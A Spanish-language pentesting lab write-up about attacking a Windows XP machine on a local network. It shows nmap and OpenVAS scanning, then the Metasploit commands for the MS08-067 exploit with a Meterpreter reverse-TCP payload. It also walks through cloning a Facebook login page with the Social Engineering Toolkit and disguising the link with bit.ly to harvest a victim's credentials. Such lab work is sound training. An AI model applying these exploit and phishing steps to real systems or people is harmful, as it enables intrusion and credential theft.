pen testing

19
Reconocimiento Pasivo Hacemos un ifconfig para saber que ip tenemos Vemos que tenemos la ip 192.168.1.118, así que utilizaremos nmap para mapear toda la red y ver que hosts estan conectados y que Sistema Operativo utiliza. Para esto utilizaremos el siguiente comando: # nmap -O 192.168.1.0/24 Del resultado que nos arroja vemos que hay un host con ip 192.168.1.123 que esta corriendo sobre un sistema Operativo Windows XP y que tiene abiertos los puertos 135, 139, 445 y 2869 abiertos

Upload: andres-quintero-arias

Post on 29-Sep-2015

21 views

Category:

Documents


2 download

DESCRIPTION

Laboratorio de Pentesting

TRANSCRIPT

  • Reconocimiento Pasivo

    Hacemos un ifconfig para saber que ip tenemos

    Vemos que tenemos la ip 192.168.1.118, as que utilizaremos nmap para mapear toda la red y ver que hosts estan conectados y que Sistema Operativo utiliza. Para esto utilizaremos el siguiente comando:

    # nmap -O 192.168.1.0/24

    Del resultado que nos arroja vemos que hay un host con ip 192.168.1.123 que esta corriendo sobre un sistema Operativo Windows XP y que tiene abiertos los puertos 135, 139, 445 y 2869 abiertos

  • Ahora, abriremos la interfaz de OPENVAS (Open Vulnerability Assessment System) pero antes debemos activar el servicio desde el menu Aplicaciones/Kali Linux/ Vulnerability Analisis/OpenVAS/openvas start

  • Luego de esto, entramos desde nuestro navegador a la direccin http://127.0.0.1:9392 y nos abrir la siguiente interfaz de bienvenida:

    http://127.0.0.1:9392/
  • despues de que nos logueamos, en la interfaz nos vamos a Configuration/Targets , luego en el botn de nombre New Target para agregar un nuevo objetivo que ser nuestro pc con Windows XP.

    en la siguiente pantalla en Name ponemos el nombre que le queremos dar a nuestro objetivo(XP), en Hosts lo ponemos en manual para agregar la ip 192.168.1.123 que es la direccin de nuestra victima,

  • en Port List, dejamos los de por defecto de openvas( OpenVAS default) y en Alive Test ponemos (TCP-ACK service & ARP ping). Por ultimo le damos Click al botn de Create Target.

    Luego de haber creado el objetivo, nos vamos a Scan Management/Tasks

    para luego hacer clic en el botn de nombre New Task, e ingresar la informacin requerida como un

  • nombre, la configuracin del escaneo y los objetivos del escaneo. Luego hacer clic en el botn de nombre Create Task.

    Despus de haber creado la tarea le damos a Start para empezar el escaneo de vulnerabilidades y le decimos que se refresque la pgina cada 10 segundos para saber el progreso del reporte

  • Despus de haber creado el reporte nos sale los detalles del escaneo.

    Para ver el reporte completo, le damos click a la fecha

    En este reporte nos dice las vulnerabilidades y el nivel de gravedad que tiene. Este reporte se puede guardar en PDF.

  • PRIMER EXPLOIT (MS08_067_NETAPI)

    En el reporte vemos que hay una vulnerabilidad en SMB en el puerto 445, as que buscamos en internetsi hay algun exploit que podamos utilizar para aprovecharnos de esta vulnerabilidad

    Vemos que hay muchos links que nos pueden servir para esto, veremos que es lo que tiene el segundo link ya que nos habla de metasploit

    http://www.binarytides.com/hack-windows-xp-metasploit/

    seguimos los pasos que nos dicen en la pgina:1. abrimos por consola metasploit con el comando msfconsole

    http://www.binarytides.com/hack-windows-xp-metasploit/
  • 2. le decimos a metasploit que use el exploit ms08_067_netapi con el comandouse exploit/windows/smb/ms08_067_netapi3. indicamos la direccion del objetivo (nuestro windows XP victima) con el comandoset RHOST 192.168.1.123

    4. indicamos nuestra ip con el comandoset LHOST 192.168.1.102

    5. cargamos el payload. Payload es la parte de cdigo que se ejecuta junto con el exploit y proporcionaal hacker una consola de conexin con la ip atacada. Para cargar el payload usamos: set PAYLOAD windows/meterpreter/reverse_tcp . Tomaremos un pantallazo para mostrar un resumen de los comandos

    6. para ver la configuracin que tenemos usamos el comando show options

  • 7. para ejecutar el exploit utilizamos el comando exploit (el comando run tambin sirve). Ya corriendo el exploit si le damos el comando sysinfo nos muestra el nombre de la maquina, el sistema operativo, laarquitectura y el lenguaje del sistema. Si le damos el comando shell accedemos directamente a la consola DOS con privilegios de administrador

  • ATAQUE CON INGENIERA SOCIAL

    para este tipo de ataque, usaremos una herramienta que ya esta preinstalada en Kali Linux que se llama SET (Social Engineering Toolkit) que es un conjunto de herramientas para hacer ataques con ingenierasocial. Con esta herramienta vamos a clonar un sitio web para que la victima ingrese su usuario y contrasea

    Lo podemos ejecutar de dos maneras: desde el menu Kali Linux/Exploitation Tools/Social Engineering Toolkit/setoolkit directamente desde la consola de linux como setoolkit

  • Presionamos 1 para Ataques de Ingeniera Social y pulsamos Enter

    Presionamos 2 (Website Attack Vectors) y pulsamos Enter

  • Presionamos 3 (Credential Harvester Attack Method) y presionamos Enter

    Presionamos 2 (Site Cloner) y presionamos Enter para decirle que queremos que clone un sitio web y

  • se haga pasar por l

    Ingresamos nuestra ip y presionamos Enter

    Ingresamos la URL que deseamos clonar y presionamos Enter

    Ac nos muestra que ya ha clonado el sitio y que activo el servidor Apache y nos dice que toda la

  • salida del ataque va a quedar en el directorio /var/www

    si desde nuestro navegador ingresamos nuestra direccin ip (192.168.1.102) veremos esto:

    Ahora usamos un servicio como bit.ly https://bitly.com/ que es un acortador de urls para enmascarar nuestra ip y que piense que es un link de internet y no local, para eso entramos al sitio, ponemos nuestra ip y le damos al boton SHORTEN

    https://bitly.com/
  • esto nos devuelve un link y se lo enviamos a nuestra victima de algn modo

    la victima entra al sitio y al ver e ingenuamente ingresa de nuevo su usuario y contrasea de facebook

  • Esperamos a que la victima ingrese y miramos en la ruta /var/www los archivos de texto que inician con nombre harvester

    vemos la informacion que hay dentro del archivo y vemos lo siguiente:

  • y ahi vemos el usuario y la contrasea que ingreso a nuestra pgina clonada, ms otra informacion de las peticiones POST que se realizan al servidor. Tambien si queremos podemos ver nuestro log del servidor de apache para mirar la ip desde la que se ingreso utilizando la hora que se registra en el nombre del archivo harvester, en nuesro caso fue el 24 de Marzo a las 14:51. El log lo vemos en la ruta/var/log/apache2/access.log

    Referencias

  • http://www.kalitutorials.net/2014/05/social-engineering-toolkit-kali.html

    http://www.kalitutorials.net/2014/05/social-engineering-toolkit-kali.html